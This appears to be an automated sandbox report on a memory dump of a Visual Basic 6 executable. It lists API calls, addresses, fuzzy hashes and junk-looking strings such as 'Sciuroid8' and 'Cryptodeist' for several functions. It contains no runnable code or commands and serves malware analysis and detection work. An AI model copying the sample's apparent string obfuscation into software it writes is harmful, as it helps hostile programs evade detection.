Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresult$#518#522#629#667BstrChkstkNew2
String ID: Langfredagene5$Picry$SUPERSERIOUS$Skovede1$appdata$f$galopbanernes
API String ID: 1362175604-1043247457
Opcode ID: 3ef2b7d5c46d8022f39fbf57bfa629afe8e82506dd976061f03c2d49f8e79b24
Instruction ID: 9f4e8340e245fce694b74ec5e0d5aca1eee28677b39bd58d7b4af9f48fe85b1a
Opcode Fuzzy Hash: 3ef2b7d5c46d8022f39fbf57bfa629afe8e82506dd976061f03c2d49f8e79b24
Instruction Fuzzy Hash: 0C81FA72D00218ABDB14EB91CC45FDEB7B9BF04304F1085AAE505B71A1EB785B89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC50, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FC6D
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,00401546), ref: 0041FC92
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,0000004C), ref: 0041FCF4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 0041FD46
__vbaFreeObj.MSVBVM60 ref: 0041FD5D
#697.MSVBVM60(00003139), ref: 0041FD67
__vbaStrMove.MSVBVM60(00003139), ref: 0041FD71
#618.MSVBVM60(?,00000064,00003139), ref: 0041FD7B
__vbaStrMove.MSVBVM60(?,00000064,00003139), ref: 0041FD85
__vbaStrCmp.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FD90
__vbaFreeStr.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDA7
__vbaVarDup.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDCF
#666.MSVBVM60(?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDDC
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDFB
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE01
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE0B
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE1A
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE22
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000), ref: 0041FE35
__vbaGet3.MSVBVM60(00000000,00000001,00000001), ref: 0041FE45
__vbaFileClose.MSVBVM60(00000001,00000000,00000001,00000001), ref: 0041FE4C
#526.MSVBVM60(?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE57
__vbaStrVarMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE60
__vbaStrMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE6A
__vbaFreeVar.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE72
#696.MSVBVM60(Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE7C
__vbaFreeStr.MSVBVM60(0041FECC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEB6
__vbaFreeStr.MSVBVM60(0041FECC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEBE
__vbaFreeStr.MSVBVM60(0041FECC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEC6

Strings

\qc17, xrefs: 0041FDE1
Sciuroid8, xrefs: 0041FD8B
Rutiner, xrefs: 0041FE77
appdata, xrefs: 0041FDBB

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckFileHresult$#526#618#666#696#697ChkstkCloseGet3ListNew2Open
String ID: Rutiner$Sciuroid8$\qc17$appdata
API String ID: 862176544-1118470403
Opcode ID: a3810d19d4ca8b7809da29301cd96011e8d686186eb5e73da6d7b49df30c274e
Instruction ID: 6286e1cac6bc4842638b7be6c62ba3b45a710a2077f63fb351c5ba841ef899ad
Opcode Fuzzy Hash: a3810d19d4ca8b7809da29301cd96011e8d686186eb5e73da6d7b49df30c274e
Instruction Fuzzy Hash: C3510D71900218AFDB10EBA1CD46FDEB7B8AF14708F10817AF105B71E1DB785A85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE1A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EE36
#526.MSVBVM60(?,000000E8,?,?,?,?,00401546), ref: 0041EE63
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE76
#712.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE86
__vbaStrMove.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE90
__vbaFreeStr.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE98
__vbaFreeVar.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EEA0
#685.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EEA5
__vbaObjSet.MSVBVM60(00000000,00000000,Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8), ref: 0041EEAF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040264C,0000001C), ref: 0041EEDE
#613.MSVBVM60(?,00000003), ref: 0041EF01
__vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0041EF0A
__vbaStrMove.MSVBVM60(?,?,00000003), ref: 0041EF14
__vbaFreeObj.MSVBVM60(?,?,00000003), ref: 0041EF1C
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0041EF2B
#574.MSVBVM60(00000003), ref: 0041EF45
__vbaStrMove.MSVBVM60(00000003), ref: 0041EF4F
__vbaStrCmp.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF5A
__vbaFreeStr.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF6D
__vbaFreeVar.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF75
#611.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF86
__vbaStrMove.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF90
__vbaNew2.MSVBVM60(0040259C,004223C0,INVALIDNESS,00000000,00000003), ref: 0041EFA8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0041EFF5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000068), ref: 0041F036
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000068), ref: 0041F055
__vbaFreeStr.MSVBVM60(0041F09D,INVALIDNESS,00000000,00000003), ref: 0041F087
__vbaFreeStr.MSVBVM60(0041F09D,INVALIDNESS,00000000,00000003), ref: 0041F08F
__vbaFreeStr.MSVBVM60(0041F09D,INVALIDNESS,00000000,00000003), ref: 0041F097

Strings

Fribords2, xrefs: 0041EE7C
INVALIDNESS, xrefs: 0041EF55
Flimflam, xrefs: 0041EE81

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$#526#574#611#613#685#712ChkstkListNew2
String ID: Flimflam$Fribords2$INVALIDNESS
API String ID: 2258197736-3412120936
Opcode ID: f3033331b7b5841a882ad28fe36af074375b8c63f1e990462f40b42538c18e7c
Instruction ID: 42a8e989c12e80aecfa1cc5b8e89ae9cb5c3b47e7947c4ac95b0f4058153ffdd
Opcode Fuzzy Hash: f3033331b7b5841a882ad28fe36af074375b8c63f1e990462f40b42538c18e7c
Instruction Fuzzy Hash: 7471E671D00218ABDB00EBA5D885BDDBBB8BF08704F50813AF505BB1E2DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2C4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F2E1
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F2F9
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F304
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F311
#524.MSVBVM60(?,00004008), ref: 0041F32B
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F346
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F352
__vbaNew2.MSVBVM60(0040259C,004223C0,00008008,?,?,?,?,00004008), ref: 0041F376
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F3C3
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,000000D8,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F40A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F434
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F43C
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F454
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,?,?,?,00008008,?,?,?,?), ref: 0041F4A1
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F4E1
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F4FB
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F505
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,0000013C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F534
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F54B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F553
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F55B
#536.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F572
__vbaStrMove.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F57C
__vbaFreeVar.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F584
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5BD
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5C5
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5CD
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5D5
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5DD

Strings

Gurgledes, xrefs: 0041F309
ICHTHYOPOLISM, xrefs: 0041F330

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$CopyMove$ChkstkNew2$#524#536#703
String ID: Gurgledes$ICHTHYOPOLISM
API String ID: 2536202667-1995639141
Opcode ID: ed9cbcf699c8d69c2cf80d41fbead2f660abd6394d2512a5dd200d9f78887e4e
Instruction ID: b3c566b355482b57377b37e971ed18877d79850291c35d20e2b1ade5fc0181c7
Opcode Fuzzy Hash: ed9cbcf699c8d69c2cf80d41fbead2f660abd6394d2512a5dd200d9f78887e4e
Instruction Fuzzy Hash: FE91F771D00218EFDB10EFA5C985BDDBBB5BF09304F60816AE005B71A2DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F5FE, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F61C
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F634
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F63F
__vbaLenBstrB.MSVBVM60(Dukkestuer,?,?,?,?,00401546), ref: 0041F64F
#564.MSVBVM60(00000004,?), ref: 0041F67C
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041F696
__vbaVarTstLt.MSVBVM60(?,00008003,?,?,?,00000004,?), ref: 0041F6B5
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,?,?,00000004,?), ref: 0041F6CB
#546.MSVBVM60(?,?,?,00401546), ref: 0041F6E6
__vbaVarMove.MSVBVM60(?,?,?,00401546), ref: 0041F6F1
__vbaVarDup.MSVBVM60 ref: 0041F718
#629.MSVBVM60(?,?,00000005,00000002), ref: 0041F72B
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F73E
#712.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F74E
__vbaStrMove.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F758
#527.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F75E
__vbaStrMove.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F768
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F777
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00401546), ref: 0041F78D
__vbaStrCopy.MSVBVM60(?,?,00401546), ref: 0041F79D
__vbaFreeStr.MSVBVM60(0041F806,?,?,00401546), ref: 0041F7E8
__vbaFreeStr.MSVBVM60(0041F806,?,?,00401546), ref: 0041F7F0
__vbaFreeVar.MSVBVM60(0041F806,?,?,00401546), ref: 0041F7F8
__vbaFreeStr.MSVBVM60(0041F806,?,?,00401546), ref: 0041F800

Strings

Dukkestuer, xrefs: 0041F64A
LAAGETS, xrefs: 0041F704
Antievangelical9, xrefs: 0041F795
SNVRET, xrefs: 0041F744
OVERBEBYRDES, xrefs: 0041F749

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyListMove$#527#546#564#629#712BstrCheckChkstkHresult
String ID: Antievangelical9$Dukkestuer$LAAGETS$OVERBEBYRDES$SNVRET
API String ID: 3927249403-1920341584
Opcode ID: 4aa486b8403f2ab1d3a52087a52ee22202fdb5959a08ae937403575e1ae1e72b
Instruction ID: 91e37aafcf061903c238f2ee37cd7516ea807def931bc120dfbf4a8747ae6ff2
Opcode Fuzzy Hash: 4aa486b8403f2ab1d3a52087a52ee22202fdb5959a08ae937403575e1ae1e72b
Instruction Fuzzy Hash: 2D51EA72D00209ABDB10EBE1C846FDEB778AF04704F50817AB515B71E1EB785A4A8B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC89, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041ECA5
__vbaInStrB.MSVBVM60(00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ECE0
__vbaVarDup.MSVBVM60 ref: 0041ED12
#629.MSVBVM60(?,00000000,00000048,00000002), ref: 0041ED25
__vbaStrVarMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041ED2E
__vbaStrMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041ED38
__vbaFreeVarList.MSVBVM60(00000003,00000000,00000002,?,?,?,00000000,00000048,00000002), ref: 0041ED4B
#539.MSVBVM60(?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED60
__vbaStrVarMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED69
__vbaStrMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED73
__vbaFreeVar.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED7B
#696.MSVBVM60(GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ED85
#698.MSVBVM60(00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ED92
__vbaStrVarMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ED9B
__vbaStrMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDA5
__vbaFreeVar.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDAD
__vbaFreeStr.MSVBVM60(0041EDF3,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDE5
__vbaFreeStr.MSVBVM60(0041EDF3,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDED

Strings

Fritgaaende, xrefs: 0041ECD9
Flskekdet, xrefs: 0041ECFE
SKADESLSHOLDELSERNE, xrefs: 0041ECD4
GILENO, xrefs: 0041ED80

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$#539#629#696#698ChkstkList
String ID: Flskekdet$Fritgaaende$GILENO$SKADESLSHOLDELSERNE
API String ID: 1195518721-3815085929
Opcode ID: 21f479d4e8549f9512b131d84e4517ec8e55ee5aa513d9b356b125a0af386eab
Instruction ID: 3165435b05d5f84532501bab556701fdef39b2ce11282541f8c55afe617deff8
Opcode Fuzzy Hash: 21f479d4e8549f9512b131d84e4517ec8e55ee5aa513d9b356b125a0af386eab
Instruction Fuzzy Hash: 1B31C972940258ABDB00FBD1DD86FEE77B8BB04704F54442AB501BB1E1DB789A098B58

Uniqueness

Uniqueness Score: -1.00%

Function 00420C47, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420C65
#535.MSVBVM60(?,?,?,?,00401546), ref: 00420CAF
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,00401546), ref: 00420CD1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,0000004C), ref: 00420D33
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 00420D85
__vbaFreeObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 00420D9C
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DC2
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DCC
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DD4
#613.MSVBVM60(?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DF6
#632.MSVBVM60(?,?,000000E7,?,?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420E1A
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?,?,00000003), ref: 00420E3F
__vbaVarTstEq.MSVBVM60(00008008,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?), ref: 00420E5F
__vbaFreeVarList.MSVBVM60(00000006,00000003,?,?,00000003,?,00008008,00008008,?,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420E8B
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 00420EA7
#527.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420EB8
__vbaStrMove.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420EC2
__vbaFreeStr.MSVBVM60(00420F26), ref: 00420F18
__vbaFreeStr.MSVBVM60(00420F26), ref: 00420F20

Strings

Cryptodeist, xrefs: 00420EB3

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#527#535#613#632#702#704ChkstkErrorListNew2
String ID: Cryptodeist
API String ID: 3497234973-3010629389
Opcode ID: e6ce50758a15ca2145e017513cc8d7a3dd008a7be3c4547de8487f39b0c79984
Instruction ID: a3d4a76e2b47af061966e80575315aca466b86c3be63d67db3ffe8e40ce73383
Opcode Fuzzy Hash: e6ce50758a15ca2145e017513cc8d7a3dd008a7be3c4547de8487f39b0c79984
Instruction Fuzzy Hash: A57139B1901228EBDB10DF91CE45BDDB7B8AF04314F6086AAE119B71E1DB785B48CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004205F9, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420614
#669.MSVBVM60(?,?,?,?,00401546), ref: 00420626
__vbaStrMove.MSVBVM60(?,?,?,?,00401546), ref: 00420630
__vbaStrCmp.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042063B
__vbaFreeStr.MSVBVM60(Skimmia,00000000,?,?,?,?,00401546), ref: 0042064E
#537.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420661
__vbaStrMove.MSVBVM60(00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042066B
__vbaNew2.MSVBVM60(0040259C,004223C0,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 00420683
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 004206C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000138,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042070B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00000047,Skimmia,00000000,?,?,?,?,00401546), ref: 0042071C
__vbaFreeStr.MSVBVM60(00420749,Skimmia,00000000,?,?,?,?,00401546), ref: 00420743

Strings

Printermanualen, xrefs: 004206DD
Skimmia, xrefs: 00420636

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#537#669ChkstkNew2
String ID: Printermanualen$Skimmia
API String ID: 2004920347-2169568590
Opcode ID: 2a274269b54266e1b28992246bd8cf0d3dca2d2ed5c021b36e10c649589bf6f7
Instruction ID: 1f5f0a3d536043ef6f84feea4e576f2d8cc4428acd2aad8097f42b1f72b7d2c8
Opcode Fuzzy Hash: 2a274269b54266e1b28992246bd8cf0d3dca2d2ed5c021b36e10c649589bf6f7
Instruction Fuzzy Hash: 95310871A50218AFCB00EFA5D986BEDBBF4BF48704F60442AF401B71E1DBB85951CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0BC, Relevance: 22.6, APIs: 15, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F0D8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F102
__vbaVarDup.MSVBVM60 ref: 0041F129
#607.MSVBVM60(?,000000BB,?), ref: 0041F13B
__vbaStrVarMove.MSVBVM60(?,?,000000BB,?), ref: 0041F144
__vbaStrMove.MSVBVM60(?,?,000000BB,?), ref: 0041F14E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,000000BB,?), ref: 0041F15D
#717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041F17E
__vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F187
__vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F191
__vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041F199
__vbaFreeStr.MSVBVM60(0041F1DC,?,?,?,?,00401546), ref: 0041F1BB
__vbaAryDestruct.MSVBVM60(00000000,?,0041F1DC,?,?,?,?,00401546), ref: 0041F1C6
__vbaFreeStr.MSVBVM60(00000000,?,0041F1DC,?,?,?,?,00401546), ref: 0041F1CE
__vbaFreeStr.MSVBVM60(00000000,?,0041F1DC,?,?,?,?,00401546), ref: 0041F1D6

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#607#717ChkstkCopyDestructList
String ID:
API String ID: 1752509113-0
Opcode ID: fd34a71ea108f04a8a8a388cdd11b4521b4fe85834e561fb94705d0c49acf0fb
Instruction ID: b68adc669c6a93ad871fdc12cec82a4f0000957795de364914c73f38f209ce4d
Opcode Fuzzy Hash: fd34a71ea108f04a8a8a388cdd11b4521b4fe85834e561fb94705d0c49acf0fb
Instruction Fuzzy Hash: 6E31DC72900149ABDB00FBD1C986BDEB7B9AF04708F50843AB501B71E1EB786B09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FEE9, Relevance: 16.5, APIs: 11, Instructions: 47COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FF05
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FF2F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FF3A
#612.MSVBVM60(?,?,?,?,?,00401546), ref: 0041FF43
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF4C
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF56
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF5E
#554.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FF63
